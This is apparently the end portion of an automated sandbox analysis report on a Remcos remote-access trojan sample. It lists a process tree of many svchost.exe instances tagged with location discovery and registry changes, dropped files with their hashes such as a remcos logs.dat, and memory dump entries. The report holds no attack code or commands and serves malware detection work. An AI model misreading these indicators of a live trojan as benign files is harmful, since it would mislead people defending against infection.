            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2444
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3844
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2020
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1220
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3768
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3444
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2684
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3276
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1668
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1128
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2328
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2156
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:224
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4068
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3600
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4972
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3644
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4712
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:212
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:652
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4860
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3500
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:5072
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4416
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1664
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4204
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3920

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\remcos\logs.dat
        Filesize

        144B

        MD5

        4dfc3cffa913d85c359f53273784ea4e

        SHA1

        2323e6200070047ee77501ed55aa555f880dfe81

        SHA256

        631c2408d3740aa8218670579ed044d73d2a1aed0d32db054d70a84b919a637d

        SHA512

        6ef8347c6ad37bc4abeb66867c71c3b574dbc0f3910c3ef653d459d8d7448ceac15fab68c597c4ae4eb4714f8761e4f44525ff4d979070904489cfd4f7218a1e

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_krwlrmtd.fuy.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Depraves.Ter
        Filesize

        462KB

        MD5

        fab4848cb34a94460623a50992cd5123

        SHA1

        1e1865b6c2993aa6f38b79bc1425930cc85ec72f

        SHA256

        fff355b9b7741451cdd93e4f9e4af51c95db79807b0c0286aa666965a2a71ead

        SHA512

        a08c1a7a0bc4a33b3aefdb1550d6b0ae88851f6cb01a0c1eebe6b64dcb854cd937d87f8d97a8171babfd72d6b4bb32926c983c0f5a24f7b9c6afdf5045775b71

        Download Submit

      • memory/116-132-0x0000000000E10000-0x0000000000E93000-memory.dmp

        Filesize

        524KB

        Download

      • memory/116-131-0x0000000000E10000-0x0000000000E93000-memory.dmp

        Filesize

        524KB

        Download

      • memory/116-133-0x0000000000E10000-0x0000000000E93000-memory.dmp

        Filesize

        524KB

        Download

      • memory/232-86-0x0000000000A30000-0x0000000000AB3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/232-84-0x0000000000A30000-0x0000000000AB3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/232-85-0x0000000000A30000-0x0000000000AB3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/860-78-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

        Download

      • memory/860-77-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

        Download

      • memory/860-76-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1176-71-0x0000000000330000-0x00000000003B3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1176-70-0x0000000000330000-0x00000000003B3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1176-69-0x0000000000330000-0x00000000003B3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1380-65-0x0000000000E80000-0x0000000000F03000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1380-67-0x0000000000E80000-0x0000000000F03000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1380-66-0x0000000000E80000-0x0000000000F03000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1628-19-0x0000000005300000-0x0000000005336000-memory.dmp

        Filesize

        216KB

        Download

      • memory/1628-37-0x0000000008270000-0x00000000088EA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/1628-38-0x0000000006E60000-0x0000000006E7A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/1628-44-0x0000000008EA0000-0x000000000C044000-memory.dmp

        Filesize

        49.6MB

        Download

      • memory/1628-22-0x00000000060D0000-0x0000000006136000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1628-34-0x00000000068E0000-0x00000000068FE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/1628-33-0x0000000006260000-0x00000000065B4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/1628-20-0x00000000059F0000-0x0000000006018000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/1628-21-0x0000000006030000-0x0000000006052000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1628-41-0x0000000007AF0000-0x0000000007B12000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1628-42-0x00000000088F0000-0x0000000008E94000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/1628-40-0x0000000007BF0000-0x0000000007C86000-memory.dmp

        Filesize

        600KB

        Download

      • memory/1628-36-0x0000000006910000-0x000000000695C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/1628-23-0x00000000061B0000-0x0000000006216000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2032-122-0x0000000000E80000-0x0000000000F03000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2032-121-0x0000000000E80000-0x0000000000F03000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2052-64-0x00007FF95F650000-0x00007FF960111000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2052-15-0x00007FF95F650000-0x00007FF960111000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2052-5-0x000001C177BC0000-0x000001C177BE2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2052-16-0x00007FF95F650000-0x00007FF960111000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2052-35-0x00007FF95F653000-0x00007FF95F655000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2052-39-0x00007FF95F650000-0x00007FF960111000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2052-4-0x00007FF95F653000-0x00007FF95F655000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2056-75-0x0000000000B70000-0x0000000000BF3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2056-73-0x0000000000B70000-0x0000000000BF3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2056-74-0x0000000000B70000-0x0000000000BF3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2168-126-0x00000000004D0000-0x0000000000553000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2168-125-0x00000000004D0000-0x0000000000553000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2168-124-0x00000000004D0000-0x0000000000553000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2344-59-0x0000000000EF0000-0x0000000000F73000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2344-60-0x0000000000EF0000-0x0000000000F73000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2344-61-0x0000000000EF0000-0x0000000000F73000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2428-97-0x0000000000EA0000-0x0000000000F23000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2428-95-0x0000000000EA0000-0x0000000000F23000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2428-96-0x0000000000EA0000-0x0000000000F23000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2668-58-0x0000000002360000-0x0000000005504000-memory.dmp

        Filesize

        49.6MB

        Download

      • memory/3168-99-0x0000000000A00000-0x0000000000A83000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3168-100-0x0000000000A00000-0x0000000000A83000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3168-101-0x0000000000A00000-0x0000000000A83000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3836-103-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3836-104-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4140-81-0x00000000010E0000-0x0000000001163000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4140-80-0x00000000010E0000-0x0000000001163000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4140-82-0x00000000010E0000-0x0000000001163000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4268-136-0x0000000000750000-0x00000000007D3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4564-94-0x0000000000600000-0x0000000000683000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4564-92-0x0000000000600000-0x0000000000683000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4564-93-0x0000000000600000-0x0000000000683000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4604-88-0x00000000012A0000-0x0000000001323000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4604-89-0x00000000012A0000-0x0000000001323000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4604-90-0x00000000012A0000-0x0000000001323000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4624-119-0x0000000000F20000-0x0000000000FA3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4624-118-0x0000000000F20000-0x0000000000FA3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4624-117-0x0000000000F20000-0x0000000000FA3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4668-114-0x0000000000A00000-0x0000000000A83000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4668-115-0x0000000000A00000-0x0000000000A83000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4932-128-0x0000000000750000-0x00000000007D3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4932-129-0x0000000000750000-0x00000000007D3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4932-130-0x0000000000750000-0x00000000007D3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4940-107-0x0000000000E20000-0x0000000000EA3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4940-106-0x0000000000E20000-0x0000000000EA3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4940-108-0x0000000000E20000-0x0000000000EA3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4988-112-0x0000000000ED0000-0x0000000000F53000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4988-111-0x0000000000ED0000-0x0000000000F53000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4988-110-0x0000000000ED0000-0x0000000000F53000-memory.dmp

        Filesize

        524KB

        Download